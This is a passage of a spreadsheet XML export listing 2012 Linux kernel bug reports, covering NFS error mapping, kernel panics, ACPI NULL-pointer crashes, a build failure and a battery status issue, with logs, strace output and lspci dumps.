Capabilities: [d0] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s, Latency L0 &lt;4us, L1 &lt;64us ClockPM- Surprise+ LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- Unsup</t>
  </si>
  <si>
    <t>NFS4ERR_SHARE_DENIED errors are translated to EIO</t>
  </si>
  <si>
    <t>3.0.0-19 x86_64</t>
  </si>
  <si>
    <t>2012-05-23 22:58 UTC</t>
  </si>
  <si>
    <t>Kevin Jamieson</t>
  </si>
  <si>
    <t>I noticed while testing against a NetApp filer that the Linux NFSv4 client currently translates NFS4ERR_SHARE_DENIED errors to EIO; it would be nice if this was translated to something more sensible like EACCES. (This was on an Ubuntu 11.10 client, but AFAICT NFS4ERR_SHARE_DENIED is not referenced in the mainline kernel tree either.) # uname -a Linux kjamieson 3.0.0-19-generic #33-Ubuntu SMP Thu Apr 19 19:05:14 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux # strace cat /mnt/file1 open("/mnt/file1", O_RDONLY) = -1 EIO (Input/output error) Network File System [Program Version: 4] [V4 Procedure: COMPOUND (1)] Status: NFS4ERR_SHARE_DENIED (10015) Tag: &lt;EMPTY&gt; length: 0 contents: &lt;EMPTY&gt; Operations (count: 3) Opcode: PUTFH (22) Status: NFS4_OK (0) Opcode: SAVEFH (32) Status: NFS4_OK (0) Opcode: OPEN (18) Status: NFS4ERR_SHARE_DENIED (10015) As a point of comparison, Solaris appears to map NFS4ERR_SHARE_DENIED to EACCES: # uname -a SunOS nas-sol10-vm1 5.10 Generic_139556-08 i86pc i386 i86pc # truss cat /mnt/file1 open64("/mnt/file1", O_RDONLY) Err#13 EACCES</t>
  </si>
  <si>
    <t>Kernel panic on unloading iwlwifi - fatal exception in interrupt</t>
  </si>
  <si>
    <t>3.4.0-030400-generic</t>
  </si>
  <si>
    <t>2012-05-24 16:50 UTC</t>
  </si>
  <si>
    <t>2015-11-22 07:29 UTC</t>
  </si>
  <si>
    <t>Call Trace: &lt;IRQ&gt; queue_work_on queue_work ieee80211_sta_conn_mon_timer ieee80211_sta_conn_mon_timer see attached image for full output ;)</t>
  </si>
  <si>
    <t>Kernel can't load throught UEFI (rEFInd)</t>
  </si>
  <si>
    <t>2012-05-28 06:42 UTC</t>
  </si>
  <si>
    <t>2012-06-20 04:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 73439 [details] Git bisection log Kernel version v3.4+ can't load: Error: Load Error while loading kernel ... Git bisection included also as attachment: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux.git;a=commit;h=2e064b1e131eba262c0ba4268cb79dbc72edeece Previous v3.4-rc7+ was working without any issues. System - HW: Intel board: DQ57TM; EFI v2.00 Intel CPU: i5 660@3.33GHz System - SW: gcc: 4.7.0 (20120430) glibc: 2.15 binutils: 2.22.52.20120503 kernel: latest git kmod: latest git udev: latest git util-linux: latest git Please could you look at the bug. Thank you for your time.</t>
  </si>
  <si>
    <t>VT-d/SR-IOV doesn't work in guest</t>
  </si>
  <si>
    <t>2012-06-01 07:22 UTC</t>
  </si>
  <si>
    <t>2012-08-10 06:57 UTC</t>
  </si>
  <si>
    <t>Environment: ------------ Host OS (ia32/ia32e/IA64):ia32e Guest OS (ia32/ia32e/IA64):ia32e Guest OS Type (Linux/Windows):Linux kvm.git Commit:b48b2c3e50433ff6f7e46186daa7f986bd960215 qemu-kvm Commit:18a188f66237e7b38fc8133d3862e5904c0e7ffb Host Kernel Version:3.4.0 Hardware:WSM-EP, Romley-EP Bug detailed description: -------------------------- Assign a VF or normal NIC to the guest, the guest cannot get IP address. Note:1. assign the VF of Intel 82576 NIC or 82599 NIC, the guest cannot get IP 2. hot plug a VF to the guest, the guest cannot get IP 3. assign a PF to the guest, the guest cannot get IP. kvm(next) + qemu-kvm = result b48b2c3e + 18a188f6 = bad 322728e5 + 18a188f6 = good Reproduce steps: ---------------- 1. ./pcistub.sh -h 08:10.0 ( to hide a device) 2. qemu-system-x86_64 -m 512 -device pci-assign,host=08:10.0 -net none -hda rhel6u1.qcow Current result: ---------------- The guest cannot get IP Expected result: ---------------- The guest can get IP Basic root-causing log: ---------------------- [root@vt-snb9 ~]# qemu-system-x86_64 -m 512 -device pci-assign,host=08:10.0 -net none -hda rhel6u1.qcow VNC server running on `::1:5900' assigned_dev_enable_msix: assign irq: Invalid argument fail to set MSI-X entry number for MSIX! Invalid argument assigned_dev_update_msix_mmio: Invalid argument fail to set MSI-X entry number for MSIX! Invalid argument assigned_dev_update_msix_mmio: Invalid argument</t>
  </si>
  <si>
    <t>SMIA++/SMIA sensor support breaks build</t>
  </si>
  <si>
    <t>P3 high</t>
  </si>
  <si>
    <t>3.5-rc1</t>
  </si>
  <si>
    <t>2012-06-03 23:51 UTC</t>
  </si>
  <si>
    <t>2012-07-01 09:40 UTC</t>
  </si>
  <si>
    <t>When building kernel with SMIA++/SMIA sensor support, it fails with an error. Unselecting it fixes the build procedure. LD drivers/media/video/smiapp/built-in.o CC [M] drivers/media/video/smiapp/smiapp-core.o CC [M] drivers/media/video/smiapp/smiapp-regs.o /home/dema1701/projects/kernel/linux-3/drivers/media/video/smiapp/smiapp-core.c: In function ‘smiapp_registered’: /home/dema1701/projects/kernel/linux-3/drivers/media/video/smiapp/smiapp-core.c:2472:3: error: implicit declaration of function ‘kzalloc’ [-Werror=implicit-function-declaration] /home/dema1701/projects/kernel/linux-3/drivers/media/video/smiapp/smiapp-core.c:2472:15: warning: assignment makes pointer from integer without a cast [enabled by default] /home/dema1701/projects/kernel/linux-3/drivers/media/video/smiapp/smiapp-core.c:2639:2: error: implicit declaration of function ‘kfree’ [-Werror=implicit-function-declaration] /home/dema1701/projects/kernel/linux-3/drivers/media/video/smiapp/smiapp-core.c: In function ‘smiapp_probe’: /home/dema1701/projects/kernel/linux-3/drivers/media/video/smiapp/smiapp-core.c:2808:9: warning: assignment makes pointer from integer without a cast [enabled by default] cc1: some warnings being treated as errors make[5]: *** [drivers/media/video/smiapp/smiapp-core.o] Error 1</t>
  </si>
  <si>
    <t>umounting microSD from USB SD adapter I got kernel panic</t>
  </si>
  <si>
    <t>3.4.4</t>
  </si>
  <si>
    <t>2012-06-27 12:58 UTC</t>
  </si>
  <si>
    <t>Giovanni Venturi</t>
  </si>
  <si>
    <t>2013-03-07 02:38 UTC</t>
  </si>
  <si>
    <t>I have a Samsung MB-MSAGAEU 16GB MicroSD card Essential Class 6 with USB SD adapter for my e-book reader. Sometimes I plug it into the USB slot I mount it with Thunar, I copy files, then I umount by Thunar and I got a kernel panic. The filesystem is FAT32. Is it a FAT32 regression? Better use linux-3.0.x? Steps to reproduce: Plug a Samsung MB-MSAGAEU 16GB MicroSD card Essential Class 6 with USB SD adapter into USB slot, open Thunar (Xfce file manager), mount device, copy files, then umount device by Thunar and (not always) you got a kernel panic. Seeing from the kernel panic screen I could see "fat32 detach" problem. Maybe the operation is different if done on a microSD, because I never had a kernel panic umounting USB mass storage.</t>
  </si>
  <si>
    <t>Kernel reports high load during idle, from 3.3.5-2 on</t>
  </si>
  <si>
    <t>3.3.5+</t>
  </si>
  <si>
    <t>2012-06-29 18:36 UTC</t>
  </si>
  <si>
    <t>Adam Pribyl</t>
  </si>
  <si>
    <t>2016-08-17 17:50 UTC</t>
  </si>
  <si>
    <t>On some architectures (mainly x86_64 but with 3.4.2 I see it also on i686) the kernel reports unusually high load during idle, often close to 1. Could be related to commit 6b7b95e774e2e2b32631511ad7d4c2256f1b3162 Author: Peter Zijlstra &lt;peterz@infradead.org&gt; Date: Thu Mar 1 15:04:46 2012 +0100 sched: Fix nohz load accounting -- again! but there is no clear evidence. Please refer to: https://bugzilla.redhat.com/show_bug.cgi?id=822877</t>
  </si>
  <si>
    <t>Samsung Series 9 np900x4b: ACPI does not seem to reflect charging/discharging status for the battery correctly.</t>
  </si>
  <si>
    <t>3.11.10</t>
  </si>
  <si>
    <t>2012-07-03 07:23 UTC</t>
  </si>
  <si>
    <t>Lori Holden</t>
  </si>
  <si>
    <t>2015-07-21 15:51 UTC</t>
  </si>
  <si>
    <t>Lv Zheng</t>
  </si>
  <si>
    <t>While the power supply device (ADP1) seems to always understand when the cord is plugged in and removed, the battery (BAT1) does not seem to know when it is discharging or not. Samsung Series 9 np900x4b with Fedora 17 $ uname -a Linux Lethe 3.4.4-3.fc17.x86_64 #1 SMP Tue Jun 26 20:54:56 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux (Results of acpi -i -b -a) *** AC PLUGGED IN *** Battery 0: Full, 100% Battery 0: design capacity 8400 mAh, last full capacity 8500 mAh = 100% Adapter 0: on-line *** AC REMOVED *** Battery 0: Charging, 100%, until charged Battery 0: design capacity 8400 mAh, last full capacity 8500 mAh = 100% Adapter 0: off-line *** System Suspended and woken back up *** *** AC STILL REMOVED *** Battery 0: Discharging, 100%, 06:33:49 remaining Battery 0: design capacity 8400 mAh, last full capacity 8500 mAh = 100% Adapter 0: off-line *** AC PLUGGED IN *** Battery 0: Unknown, 98% Battery 0: design capacity 8400 mAh, last full capacity 8500 mAh = 100% Adapter 0: on-line *** SUSPEND AND WAKE *** *** AC PLUGGED IN *** Battery 0: Unknown, 98% Battery 0: design capacity 8400 mAh, last full capacity 8500 mAh = 100% Adapter 0: on-line *** AC REMOVED *** Battery 0: Charging, 98%, charging at zero rate - will never fully charge. Battery 0: design capacity 8400 mAh, last full capacity 8500 mAh = 100% Adapter 0: off-line The same information is reflected when looking directly at the sysfs enteries. /sys/class/power_supply/ADP1/online shows the correct status all the time. (1 for online, 0 offline) /sys/class/power_supply/BAT1/status will show the correct status after a fresh suspend, reflecting the above results.</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel NULL pointer dereference at acpi_ns_check_object_type</t>
  </si>
  <si>
    <t>2012-07-03 09:07 UTC</t>
  </si>
  <si>
    <t>Vlastimil Babka</t>
  </si>
  <si>
    <t>2012-07-25 03:07 UTC</t>
  </si>
  <si>
    <t>(originally reported at linux-acpi@vger.kernel.org [2], filling bug as suggested) Hello, I've been experiencing kernel panic with NULL pointer dereference in acpi_ns_check_object_type since kernel 3.4 on a MacPro machine. By recompiling as much of ACPI as possible as modules, I was able to get the system running and postpone the error until doing 'modprobe acpi-cpufreq', which now results in oops, not panic. The log is attached as error.log. By bisecting linus tree between 3.3 and 3.4, I found the guilty commit 6a99b1c94d053b3420eaa4a4bc8b2883dd90a2f9 "ACPICA: Object repair code: Support to add Package wrappers" [1] However this patch does not directly touch the functions in the stack trace. Next I created a kdump of the oops, and looked around with gdb. - In acpi_ns_check_package(), the null pointer is in the parameter return_object_ptr, which is dereferenced when initializing the variable return_object. - The calling function acpi_ns_check_package_list() is in the 'case ACPI_PTYPE2_COUNT:' part, the passed null pointer is in the sub_elements variable. - Before the switch, sub_elements is initialized like this: sub_elements = sub_package-&gt;package.elements interestingly, in the crashdump, sub_elements is null, but sub_package-&gt;package.elements is non-null I've added some printk's and verified that the call of status = acpi_ns_check_object_type(data, &amp;sub_package, ACPI_RTYPE_PACKAGE, i); makes sub_package-&gt;package.elements become non-null, but sub_elements was already initialized before this call and remains null. The above led me to create the attached patch which simply moves the initialization of sub_elements after the sub_package check. I think it's this check that results in the Integer to Package conversion/wrapping. After this patch, the null pointer dereference is gone, but the debug output of ACPI (acpi.debug_layer=0xffffffff acpi.debug_level=0x00000008) shows that something is probably still wrong: [ 1.353677] nsrepair-0681 [4294967287] ns_wrap_with_package : \_PR_.CPU0._PSD: Wrapped Integer with expected Package object [ 1.353869] nsrepair-0681 [4294967287] ns_wrap_with_package : \_PR_.CPU0._PSD: Wrapped Integer with expected Package object [ 1.354059] ACPI Warning: For \_PR_.CPU0._PSD: Return Sub-Package[0] is too small - found 1 elements, expected 5 (20120320/nspredef-905) [ 1.354253] ACPI: Invalid package argument [ 1.354322] ACPI: Invalid _PSD data ... (the same for other CPUx) In comparison, 3.3 kernel with same acpi debug options shows only stuff like: [ 1.494238] nsrepair-0728 [4294967287] ns_repair_package_list: \_PR_.CPU0._PSD: Repaired incorrectly formed Package [ 1.494449] nsrepair-0728 [4294967287] ns_repair_package_list: \_PR_.CPU2._PSD: Repaired incorrectly formed Package [ 1.494657] nsrepair-0728 [4294967287] ns_repair_package_list: \_PR_.CPU4._PSD: Repaired incorrectly formed Package ... (the same for other CPUx) Since I don't know much about this subsystem, I figured that I should just report my findings at this point. The patched system is usable, but I guess it's not a complete fix. I also attach the output of acpidump. I hope I didn't forget anything important, please ask for more information if needed. Thanks, Vlastimil Babka [1] http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=6a99b1c94d053b3420eaa4a4bc8b2883dd90a2f9 [2] http://marc.info/?t=134121902100001&amp;r=1&amp;w=2 error.log Jun 29 13:50:01 macpro kernel: [ 334.597947] nsrepair-0681 [4294967287] ns_wrap_with_package : \_PR_.CPU0._PSD: Wrapped Integer with expected Package object Jun 29 13:50:01 macpro kernel: [ 334.597951] nsrepair-0681 [4294967287] ns_wrap_with_package : \_PR_.CPU0._PSD: Wrapped Integer with expected Package object Jun 29 13:50:01 macpro kernel: [ 334.597958] BUG: unable to handle kernel NULL pointer dereference at (null) Jun 29 13:50:01 macpro kernel: [ 334.597972] IP: [&lt;ffffffff812da10e&gt;] acpi_ns_check_object_type+0x1a/0x1d2 Jun 29 13:50:01 macpro kernel: [ 334.597985] PGD 36a625067 PUD 36aa2d067 PMD 0 Jun 29 13:50:01 macpro kernel: [ 334.597995] Oops: 0000 [#1] PREEMPT SMP Jun 29 13:50:01 macpro kernel: [ 334.598004] CPU 0 Jun 29 13:50:01 macpro kernel: [ 334.598007] Modules linked in: acpi_cpufreq(+) mperf thermal fan battery acpi_ipmi ipmi_msghandler ac coretemp btusb bluetooth ioatdma snd_hda_codec_realtek snd_hda_intel firewire_ohci snd_hda_codec firewire_core i7core_edac i2c_i801 applesmc processor edac_core dca snd_hwdep shpchp rtc_cmos button Jun 29 13:50:01 macpro kernel: [ 334.598075] Jun 29 13:50:01 macpro kernel: [ 334.598079] Pid: 8683, comm: modprobe Not tainted 3.3.0+ #22 Apple Inc. MacPro4,1/Mac-F221BEC8 Jun 29 13:50:01 macpro kernel: [ 334.598091] RIP: 0010:[&lt;ffffffff812da10e&gt;] [&lt;ffffffff812da10e&gt;] acpi_ns_check_object_type+0x1a/0x1d2 Jun 29 13:50:01 macpro kernel: [ 334.598102] RSP: 0018:ffff88036a75bb58 EFLAGS: 00010292 Jun 29 13:50:01 macpro kernel: [ 334.598107] RAX: ffff8803717c1ee8 RBX: ffff88036bb79500 RCX: 0000000000000000 Jun 29 13:50:01 macpro kernel: [ 334.598113] RDX: 0000000000000002 RSI: 0000000000000000 RDI: ffff88036bb79500 Jun 29 13:50:01 macpro kernel: [ 334.598119] RBP: ffff88036a75bbd8 R08: 0000000000000000 R09: 0000000000000000 Jun 29 13:50:01 macpro kernel: [ 334.598126] R10: 0000000000000000 R11: 0a7463656a626f20 R12: ffff88036bb79500 Jun 29 13:50:01 macpro kernel: [ 334.598132] R13: 0000000000000000 R14: 0000000000000002 R15: 0000000000000000 Jun 29 13:50:01 macpro kernel: [ 334.598138] FS: 00007fa70776e700(0000) GS:ffff88037fc00000(0000) knlGS:0000000000000000 Jun 29 13:50:01 macpro kernel: [ 334.598146] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Jun 29 13:50:01 macpro kernel: [ 334.598151] CR2: 0000000000000000 CR3: 000000036fa87000 CR4: 00000000000006f0 Jun 29 13:50:01 macpro kernel: [ 334.598157] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Jun 29 13:50:01 macpro kernel: [ 334.598163] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Jun 29 13:50:01 macpro kernel: [ 334.598173] Process modprobe (pid: 8683, threadinfo ffff88036a75a000, task ffff880369005a40) Jun 29 13:50:01 macpro kernel: [ 334.598180] Stack: Jun 29 13:50:01 macpro kernel: [ 334.598183] 000000000000001e 000000000000001e 7865206874697720 5020646574636570 Jun 29 13:50:01 macpro kernel: [ 334.598196] ffff88036a75bb88 ffffffff812b1c0e ffff88036a75bc18 ffffffff812e695f Jun 29 13:50:01 macpro kernel: [ 334.598208] ffff88036a75bbb8 ffffffff00000030 ffff88036a75bc38 ffffffff8184632e Jun 29 13:50:01 macpro kernel: [ 334.598221] Call Trace: Jun 29 13:50:01 macpro kernel: [ 334.598227] [&lt;ffffffff812b1c0e&gt;] ? acpi_os_vprintf+0x2b/0x2d Jun 29 13:50:01 macpro kernel: [ 334.598234] [&lt;ffffffff812e695f&gt;] ? acpi_debug_print+0xf1/0x100 Jun 29 13:50:01 macpro kernel: [ 334.598241] [&lt;ffffffff812da4b0&gt;] acpi_ns_check_package_list+0x157/0x21a Jun 29 13:50:01 macpro kernel: [ 334.598249] [&lt;ffffffff812daa7c&gt;] acpi_ns_check_predefined_names+0x3dd/0x48d Jun 29 13:50:01 macpro kernel: [ 334.598256] [&lt;ffffffff812b2373&gt;] ? acpi_os_signal_semaphore+0x5f/0x6f Jun 29 13:50:01 macpro kernel: [ 334.598263] [&lt;ffffffff812d8886&gt;] acpi_ns_evaluate+0x32e/0x3b7 Jun 29 13:50:01 macpro kernel: [ 334.598271] [&lt;ffffffff810fd77f&gt;] ? kmem_cache_alloc+0x8f/0xb0 Jun 29 13:50:01 macpro kernel: [ 334.598278] [&lt;ffffffff812dcc06&gt;] acpi_evaluate_object+0x1ec/0x34e Jun 29 13:50:01 macpro kernel: [ 334.598286] [&lt;ffffffff810d80eb&gt;] ? pcpu_alloc+0x90b/0xa10 Jun 29 13:50:01 macpro kernel: [ 334.598295] [&lt;ffffffffa007157f&gt;] acpi_processor_preregister_performance+0x10e/0x458 [processor] Jun 29 13:50:01 macpro kernel: [ 334.598304] [&lt;ffffffff810bc9ad&gt;] ? jump_label_module_notify+0x7d/0x200 Jun 29 13:50:01 macpro kernel: [ 334.598312] [&lt;ffffffffa0226000&gt;] ? 0xffffffffa0225fff Jun 29 13:50:01 macpro kernel: [ 334.598319] [&lt;ffffffffa0226082&gt;] acpi_cpufreq_init+0x82/0xa4 [acpi_cpufreq] Jun 29 13:50:01 macpro kernel: [ 334.598742] [&lt;ffffffff810001ca&gt;] do_one_initcall+0x3a/0x160 Jun 29 13:50:01 macpro kernel: [ 334.599278] [&lt;ffffffff810855c6&gt;] sys_init_module+0xa16/0x1bc0 Jun 29 13:50:01 macpro kernel: [ 334.599811] [&lt;ffffffff81631be2&gt;] system_call_fastpath+0x16/0x1b Jun 29 13:50:01 macpro kernel: [ 334.600337] Code: 00 e8 c9 c8 00 00 31 c0 5a 5b 41 5c 41 5d 5d c3 90 55 48 89 e5 41 57 41 56 41 89 d6 41 55 41 89 cd 41 54 53 48 89 fb 48 83 ec 58 &lt;4c&gt; 8b 26 4d 85 e4 75 13 48 89 f1 44 89 ea 44 89 f6 e8 08 0a 00 Jun 29 13:50:01 macpro kernel: [ 334.600970] RIP [&lt;ffffffff812da10e&gt;] acpi_ns_check_object_type+0x1a/0x1d2 Jun 29 13:50:01 macpro kernel: [ 334.601559] RSP &lt;ffff88036a75bb58&gt; Jun 29 13:50:01 macpro kernel: [ 334.602130] CR2: 0000000000000000 Jun 29 13:50:01 macpro kernel: [ 334.602838] ---[ end trace 217f289557e3f0cd ]---</t>
  </si>
  <si>
    <t>rt61pci kernel panic during shut down</t>
  </si>
  <si>
    <t>3.3.8</t>
  </si>
  <si>
    <t>2012-07-09 14:57 UTC</t>
  </si>
  <si>
    <t>dolohow</t>
  </si>
  <si>
    <t>2012-08-20 23:33 UTC</t>
  </si>
  <si>
    <t>I have a kernel panic when shutting down the system after added module for Ralink RT61 and installed firmware (version 1.2) on gentoo linux I can't provide the full kernel panic information: rt61 - config +0x1dl/0x2b0 kernel panic - not syncing: Fatal exception in interrupt Disabling non-boot CPUs Linux version 3.3.8-gentoo (root@HALF-BLOOD) (gcc version 4.5.3 (Gentoo 4.5.3-r2 p1.5, pie-0.4.7) ) #6 SMP Sun Jul 8 18:05:51 CEST 2012 rt61pci 21294 0 - Live 0xffffffffa0296000 rt2x00pci 4708 1 rt61pci, Live 0xffffffffa0009000 rt2x00lib 33006 2 rt61pci,rt2x00pci, Live 0xffffffffa0285000 k10temp 2731 0 - Live 0xffffffffa02e1000 fglrx 2586372 107 - Live 0xffffffffa000c000 (PO) rtl8180 29849 0 - Live 0xffffffffa0000000 00:00.0 Host bridge: Advanced Micro Devices [AMD] Family 12h Processor Root Complex Subsystem: Advanced Micro Devices [AMD] Family 12h Processor Root Complex Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 00:01.0 VGA compatible controller: Advanced Micro Devices [AMD] nee ATI BeaverCreek [Radeon HD 6530D] (prog-if 00 [VGA controller]) Subsystem: Giga-byte Technology Device d000 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 42 Region 0: Memory at d0000000 (32-bit, prefetchable) [size=256M] Region 1: I/O ports at f800 [size=256] Region 2: Memory at fdfc0000 (32-bit, non-prefetchable) [size=256K] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- DevCap2: Completion Timeout: Not Supported, TimeoutDis- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete-, EqualizationPhase1- EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest- Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0700c Data: 4171 Capabilities: [100 v1] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Kernel driver in use: fglrx_pci Kernel modules: fglrx 00:04.0 PCI bridge: Advanced Micro Devices [AMD] Family 12h Processor Root Port (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000e000-0000efff Memory behind bridge: fdd00000-fddfffff Prefetchable memory behind bridge: 00000000fdc00000-00000000fdcfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #1, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep+ BwNot+ LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #4, PowerLimit 75.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Range ABCD, TimeoutDis+ ARIFwd- DevCtl2: Completion Timeout: 65ms to 210ms, TimeoutDis- ARIFwd- LnkCtl2: Target Link Speed: 5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -3.5dB, EqualizationComplete-, EqualizationPhase1- EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest- Capabilities: [a0] MSI: Enable- Count=1/1 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 Capabilities: [b0] Subsystem: Advanced Micro Devices [AMD] Device 1234 Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [100 v1] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Kernel driver in use: pcieport 00:11.0 SATA controller: Advanced Micro Devices [AMD] Hudson SATA Controller [AHCI mode] (rev 40) (prog-if 01 [AHCI 1.0]) Subsystem: Giga-byte Technology Device b002 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 40 Region 0: I/O ports at ff00 [size=8] Region 1: I/O ports at fe00 [size=4] Region 2: I/O ports at fd00 [size=8] Region 3: I/O ports at fc00 [size=4] Region 4: I/O ports at fb00 [size=16] Region 5: Memory at fe02f000 (32-bit, non-prefetchable) [size=2K] Capabilities: [50] MSI: Enable+ Count=1/4 Maskable- 64bit+ Address: 00000000fee0700c Data: 4159 Capabilities: [70] SATA HBA v1.0 InCfgSpace Kernel driver in use: ahci 00:12.0 USB controller: Advanced Micro Devices [AMD] Hudson USB OHCI Controller (rev 11) (prog-if 10 [OHCI]) Subsystem: Giga-byte Technology Device 5004 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at fe02e000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:12.2 USB controller: Advanced Micro Devices [AMD] Hudson USB EHCI Controller (rev 11) (prog-if 20 [EHCI]) Subsystem: 